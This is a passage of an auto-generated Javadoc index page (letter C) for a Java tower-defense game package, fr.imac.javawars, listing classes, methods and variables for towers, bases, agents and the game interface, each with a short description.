CLASS="NavBarFont1Rev"><B>Index</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="index-2.html"><B>PREV LETTER</B></A>&nbsp; &nbsp;<A HREF="index-4.html"><B>NEXT LETTER</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../index.html?index-filesindex-3.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="index-3.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <A HREF="index-1.html">A</A> <A HREF="index-2.html">B</A> <A HREF="index-3.html">C</A> <A HREF="index-4.html">D</A> <A HREF="index-5.html">E</A> <A HREF="index-6.html">F</A> <A HREF="index-7.html">G</A> <A HREF="index-8.html">H</A> <A HREF="index-9.html">I</A> <A HREF="index-10.html">J</A> <A HREF="index-11.html">L</A> <A HREF="index-12.html">M</A> <A HREF="index-13.html">N</A> <A HREF="index-14.html">O</A> <A HREF="index-15.html">P</A> <A HREF="index-16.html">R</A> <A HREF="index-17.html">S</A> <A HREF="index-18.html">T</A> <A HREF="index-19.html">U</A> <A HREF="index-20.html">V</A> <A HREF="index-21.html">W</A> <HR> <A NAME="_C_"><!-- --></A><H2> <B>C</B></H2> <DL> <DT><A HREF="../fr/imac/javawars/engine/Projectile.html#calcDestination()"><B>calcDestination()</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Projectile.html" title="class in fr.imac.javawars.engine">Projectile</A> <DD>Calculate the straight of the projectile. <DT><A HREF="../fr/imac/javawars/engine/Ground.html#centerBases"><B>centerBases</B></A> - Variable in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Ground.html" title="class in fr.imac.javawars.engine">Ground</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/player/CenterPanel.html" title="class in fr.imac.javawars.player"><B>CenterPanel</B></A> - Class in <A HREF="../fr/imac/javawars/player/package-summary.html">fr.imac.javawars.player</A><DD>Class CenterPanel: create panel where map goes<DT><A HREF="../fr/imac/javawars/player/CenterPanel.html#CenterPanel(javax.swing.JLayeredPane)"><B>CenterPanel(JLayeredPane)</B></A> - Constructor for class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/CenterPanel.html" title="class in fr.imac.javawars.player">CenterPanel</A> <DD>CONSTRUCTOR <DT><A HREF="../fr/imac/javawars/player/Ihm.html#centerPanel"><B>centerPanel</B></A> - Variable in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/Ihm.html" title="class in fr.imac.javawars.player">Ihm</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/engine/ProcessorBase.html#change"><B>change</B></A> - Variable in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/ProcessorBase.html" title="class in fr.imac.javawars.engine">ProcessorBase</A> <DD>Used to detecte if we some life Base change <DT><A HREF="../fr/imac/javawars/engine/AbstractTowerBase.html#changeActionField(double)"><B>changeActionField(double)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/AbstractTowerBase.html" title="class in fr.imac.javawars.engine">AbstractTowerBase</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/engine/Tower.html#changeActionField(double)"><B>changeActionField(double)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Tower.html" title="class in fr.imac.javawars.engine">Tower</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/player/Player.html#changeMoney(double)"><B>changeMoney(double)</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/Player.html" title="class in fr.imac.javawars.player">Player</A> <DD>add money to the player <DT><A HREF="../fr/imac/javawars/engine/AbstractTowerBase.html#changePlayer(fr.imac.javawars.player.Player)"><B>changePlayer(Player)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/AbstractTowerBase.html" title="class in fr.imac.javawars.engine">AbstractTowerBase</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/engine/Tower.html#changeStrength(int)"><B>changeStrength(int)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Tower.html" title="class in fr.imac.javawars.engine">Tower</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/engine/ProcessorTower.html#checkAgentInRangeAndAttack(fr.imac.javawars.engine.Tower)"><B>checkAgentInRangeAndAttack(Tower)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/ProcessorTower.html" title="class in fr.imac.javawars.engine">ProcessorTower</A> <DD>Check if there are any agents in the actionField of the tower <DT><A HREF="../fr/imac/javawars/engine/Base.html#checkAndAddLife(double)"><B>checkAndAddLife(double)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Base.html" title="class in fr.imac.javawars.engine">Base</A> <DD>Check if we have to add a life to a player base (not neutral) and if so, add it <DT><A HREF="../fr/imac/javawars/engine/Engine.html#checkEndGame()"><B>checkEndGame()</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Engine.html" title="class in fr.imac.javawars.engine">Engine</A> <DD>Manage the end of the game <DT><A HREF="../fr/imac/javawars/engine/ProcessorAgents.html#checkFreezeAndPoisonAttack(fr.imac.javawars.engine.Agent)"><B>checkFreezeAndPoisonAttack(Agent)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/ProcessorAgents.html" title="class in fr.imac.javawars.engine">ProcessorAgents</A> <DD>check for attacks on agents <DT><A HREF="../fr/imac/javawars/engine/Ground.html#checkSpaceBases(int, int, int, int[][])"><B>checkSpaceBases(int, int, int, int[][])</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Ground.html" title="class in fr.imac.javawars.engine">Ground</A> <DD>Check if enough space to create this circle <DT><A HREF="../fr/imac/javawars/engine/Ground.html#checkSpaceTower(int, int)"><B>checkSpaceTower(int, int)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Ground.html" title="class in fr.imac.javawars.engine">Ground</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/player/Menu.html#chooseTypeOfGame()"><B>chooseTypeOfGame()</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/Menu.html" title="class in fr.imac.javawars.player">Menu</A> <DD>Choosing type of map we want (random or from a file) <DT><A HREF="../fr/imac/javawars/engine/Base.html#computeDistanceMap(int[][])"><B>computeDistanceMap(int[][])</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Base.html" title="class in fr.imac.javawars.engine">Base</A> <DD>Compute the distance map to the base <DT><A HREF="../fr/imac/javawars/player/Ihm.html#conteneur"><B>conteneur</B></A> - Variable in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/Ihm.html" title="class in fr.imac.javawars.player">Ihm</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/player/IA.html#createAction(double, java.util.Random)"><B>createAction(double, Random)</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/IA.html" title="class in fr.imac.javawars.player">IA</A> <DD>Creating an action <DT><A HREF="../fr/imac/javawars/engine/ProcessorAction.html#createAgent(fr.imac.javawars.dispatcher.ActionAgentSend)"><B>createAgent(ActionAgentSend)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/ProcessorAction.html" title="class in fr.imac.javawars.engine">ProcessorAction</A> <DD>Create a new agent sent from a base to another (see ProcessorAgents) <DT><A HREF="../fr/imac/javawars/player/AgentsLayer.html#createAndSendAgent(fr.imac.javawars.player.Player, fr.imac.javawars.engine.Base, fr.imac.javawars.engine.Base)"><B>createAndSendAgent(Player, Base, Base)</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/AgentsLayer.html" title="class in fr.imac.javawars.player">AgentsLayer</A> <DD>Add the action which asks to create and send an agent to the dispatcher <DT><A HREF="../fr/imac/javawars/engine/Ground.html#createBases(java.awt.Point, int, fr.imac.javawars.player.Player)"><B>createBases(Point, int, Player)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Ground.html" title="class in fr.imac.javawars.engine">Ground</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/engine/Ground.html#createBases(java.awt.Point, int)"><B>createBases(Point, int)</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/Ground.html" title="class in fr.imac.javawars.engine">Ground</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/engine/BasesManager.html#createInfluenceList()"><B>createInfluenceList()</B></A> - Method in class fr.imac.javawars.engine.<A HREF="../fr/imac/javawars/engine/BasesManager.html" title="class in fr.imac.javawars.engine">BasesManager</A> <DD>Create List for IA 2, 3 and 4 with point who can create a tower ( used for action of the IA) <DT><A HREF="../fr/imac/javawars/player/Ihm.html#CreatePanel()"><B>CreatePanel()</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/Ihm.html" title="class in fr.imac.javawars.player">Ihm</A> <DD>Create panels for the interface <DT><A HREF="../fr/imac/javawars/player/IA.html#createTower(int, java.awt.Point)"><B>createTower(int, Point)</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/IA.html" title="class in fr.imac.javawars.player">IA</A> <DD>Creating a tower <DT><A HREF="../fr/imac/javawars/player/TowersLayer.html#createTower(int, int, java.lang.String)"><B>createTower(int, int, String)</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/TowersLayer.html" title="class in fr.imac.javawars.player">TowersLayer</A> <DD>Create a tower/send info to dispatcher <DT><A HREF="../fr/imac/javawars/player/IA.html#createTowers(java.util.Random)"><B>createTowers(Random)</B></A> - Method in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/IA.html" title="class in fr.imac.javawars.player">IA</A> <DD>Creating towers <DT><A HREF="../fr/imac/javawars/player/BottomBar.html#currentBase"><B>currentBase</B></A> - Variable in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/BottomBar.html" title="class in fr.imac.javawars.player">BottomBar</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/player/ListenersLayer.html#currentHumanBaseSelected"><B>currentHumanBaseSelected</B></A> - Variable in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/ListenersLayer.html" title="class in fr.imac.javawars.player">ListenersLayer</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/player/ListenersLayer.html#currentTargetBaseSelected"><B>currentTargetBaseSelected</B></A> - Variable in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/ListenersLayer.html" title="class in fr.imac.javawars.player">ListenersLayer</A> <DD>&nbsp; <DT><A HREF="../fr/imac/javawars/player/BottomBar.html#currentTower"><B>currentTower</B></A> - Variable in class fr.imac.javawars.player.<A HREF="../fr/imac/javawars/player/BottomBar.html" title="class in fr.imac.javawars.player">BottomBar</A> <DD>&nbsp; </DL> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Package</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Use</FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Index</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="index-2.html"><B>PREV LETTER</B></A>&nbsp; &nbsp;<A HREF="index-4.html"><B>NEXT LETTER</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../index.html?index-filesindex-3.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="index-3.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <A HREF="index-1.html">A</A> <A HREF="index-2.html">B</A> <A HREF="index-3.html">C</A> <A HREF="index-4.html">D</A> <A HREF="index-5.html">E</A> <A HREF="index-6.html">F</A> <A HREF="index-7.html">G</A> <A HREF="index-8.html">H</A> <A HREF="index-9.html">I</A> <A HREF="index-10.html">J</A> <A HREF="index-11.html">L</A> <A HREF="index-12.html">M</A> <A HREF="index-13.html">N</A> <A HREF="index-14.html">O</A> <A HREF="index-15.html">P</A> <A HREF="index-16.html">R</A> <A HREF="index-17.html">S</A> <A HREF="index-18.html">T</A> <A HREF="index-19.html">U</A> <A HREF="index-20.html">V</A> <A HREF="index-21.html">W</A> <HR> </BODY> </HTML>